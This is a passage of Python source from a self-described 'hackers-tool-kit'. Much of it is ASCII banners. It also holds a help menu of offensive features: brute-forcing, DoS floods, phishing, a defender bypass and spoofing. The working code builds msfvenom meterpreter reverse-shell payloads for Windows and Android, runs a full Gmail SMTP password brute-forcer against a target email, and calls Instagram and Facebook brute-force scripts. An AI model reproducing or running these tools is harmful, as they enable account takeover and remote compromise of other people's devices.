░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') +def mainbanner12(): + print """\033[91m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner13(): + print """\033[92m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner14(): + print """\033[34m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner15(): + print """\033[93m + __ _ + _wr"" "-q__ + _dP 9m_ + _#P 9#_ + d#@ \033[92mtype ? for help\033[93m 9#m + d## ### + J### ###L + {###K J###K + ]####K ___aaa___ J####F + __gmM######_ w#P"" ""9#m _d#####Mmw__ + _g##############mZ_ __g##############m_ + _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ + a###"" ,Z"#####@" '######"\g ""M##m + J#@" 0L "*## ##@" J# *#K + #" `# "_gmwgm_~ dF `#_ +7F "#_ ]#####F _dK JE +] *m__ ##### __g@" F + \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m + ` 0######_ ' + _0########_ + . _d#####^#####m__ , + "*w_________am#####P" ~9#####mw_________w*" + ""9@#####@M"" ""P@#####@M"" +\033[92m + ██░ ██ ▄▄▄█████▓ ██ ▄█▀ + ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ + ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ + ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ + ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ + ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ + ▒ ░▒░ ░ ░ ░ ░▒ ▒░ + ░ ░░ ░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░\033[0m + """.decode('utf-8') +def mainbanner16(): + print """\033[91m + :PB@Bk: + ,jB@@B@B@B@BBL. + 7G@B@B@BMMMMMB@B@B@Nr + :kB@B@@@MMOMOMOMOMMMM@B@B@B1, + :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. + 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr + G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S + @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ + B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B + @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ + @@OLB. BNB@MMOMOMM@BEB rBjM@B + @@ @ M OBOMOMM@q M .@ @@ + @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B + @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ + B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B + @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ + B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M + J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv + iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: + . B@M@B@MMM@B@B@B@MMM@@@M@B + @B@B.i@MBB@B@B@@BM@::B@B@ + B@@@ .B@B.:@B@ :B@B @B@O + :0 r@B@ B@@ .@B@: P: + vMB :@B@ :BO7 + ,B@B\033[0m + + \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m + ███████████████████████████ + type █?█ for help + ███ + \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ + ██ ██ \033[0m███\033[31m ██ ██▀ + ██ ██ \033[0m███\033[31m ██▄██ + ████████ \033[0m███\033[31m █████ + ██ ██ \033[0m███\033[31m ██ ██▄ + ██ ██ \033[0m███\033[31m ██ ██▄ + ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m + """.decode('utf-8') +def mainbanner17(): + print """ + + .---. + |---| + type |-\033[32m?\033[0m-| for help + |---| + .---^ - ^---. + :___________: + \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m + ███ ███ | |//| ███ ▄███▀ + ███ ███ | |//| ███▐██▀ + ███▄▄▄▄███ | |//| █████▀ + ███▀▀▀▀███ | |//| █████▄ + ███ ███ | |//| ███▐██▄ + ███ ███ | |.-| ███ ▀███▄ + \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m + \***/ + \*\033[91m/\033[31m + V\033[0m + """.decode('utf-8') +def mainbanner18(): + print """ + Type \033[31m?\033[0m For\033[31m Help\033[0m +\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ +║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ +║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m +║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ +║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ +╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ + """.decode('utf-8') +def mainbanner19(): + print """\033[31m + # # + # # + %# \033[0m@tuf_unkn0wn\033[31m ## + ,%/ /%, + %## ##% + &%## ##%& + ,%%#####/. ,/#####%%, + %&%%#####/ \033[0m████\033[31m /#####%%&% + .&&%%%&& \033[0m████\033[31m &&%%%&&. + /&%( \033[0m████\033[31m (%&( + \033[0m████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + ████ + \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ +██ \033[0m██████████████████████████████\033[31m ██ +███████ \033[0m██████████████████████████████\033[31m ███████ +██ ██ \033[0m████ \033[31m ██ ██ + ██████ \033[0m████ \033[31m ██████ + ▒ ▓▒ ▒ ▒ ▓▒ ▒ + ░ ▒ ░ ██████ ░ ▒ ░ + ░ ░ ██ ░ ░ + ███████ + ██ ██ + ██████ + ▒ ▓▒ ▒ + ░ ▒ ░ + ░ ░\033[0m + """.decode('utf-8') +def mainbanner20(): + print """ + + + ██╗\033[31m██╗ ██╗\033[0m██╗ ██╗\033[92m████████╗\033[0m██╗ ██╗\033[34m██╗ ██╗\033[0m██╗ + ██╔╝\033[31m██║ \033[31m██║\033[0m╚██╗ ██╔╝\033[92m╚══\033[92m██╔══╝\033[0m╚██╗ ██╔╝\033[34m██║ ██╔╝\033[0m╚██╗ +██╔╝ \033[31m███████║ \033[0m╚██╗██╔╝\033[92m ██║ \033[0m╚██╗██╔╝\033[34m █████╔╝ \033[0m╚██╗ +╚██╗ \033[31m██╔══██║ \033[0m██╔╝╚██╗ \033[92m██║ \033[0m ██╔╝╚██╗\033[34m ██╔═██╗\033[0m ██╔╝ + ╚██╗\033[31m██║ ██║\033[0m██╔╝ ╚██╗\033[92m ██║ \033[0m ██╔╝ ╚██╗\033[34m██║ ██╗\033[0m██╔╝ + ╚═╝\033[31m╚═╝ ╚═╝\033[0m╚═╝ ╚═╝\033[92m ╚═╝ \033[0m ╚═╝ ╚═╝\033[34m╚═╝ ╚═╝\033[0m╚═╝ + Created by @tuf_unkn0wn type ? for help + + """.decode('utf-8') +def mainbanner21(): + os.system("cat /root/hackers-tool-kit/tools/venombanner.txt") + + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,21) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() + if num == 12: + mainbanner12() + if num == 13: + mainbanner13() + if num == 14: + mainbanner14() + if num == 15: + mainbanner15() + if num == 16: + mainbanner16() + if num == 17: + mainbanner17() + if num == 18: + mainbanner18() + if num == 19: + mainbanner19() + if num == 20: + mainbanner20() + if num == 21: + mainbanner21() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +reboot : reboot hackers-tool-kit +update : update the hackers-tool-kit +clear : clears screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +rhawk : run the RED_HAWK script (info gathering tool) +nano : open nano text editor +compilec: compile a c file +dnsspoof: dns spoofing [type dnsspoofall to spoof entire subnet] +htk-lite: run a lighter version of hackers-tool-kit +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + print "\033[1m\033[33m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" + k = raw_input("MODE> ") + ma = 'python3 /root/hackers-tool-kit/tools/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = 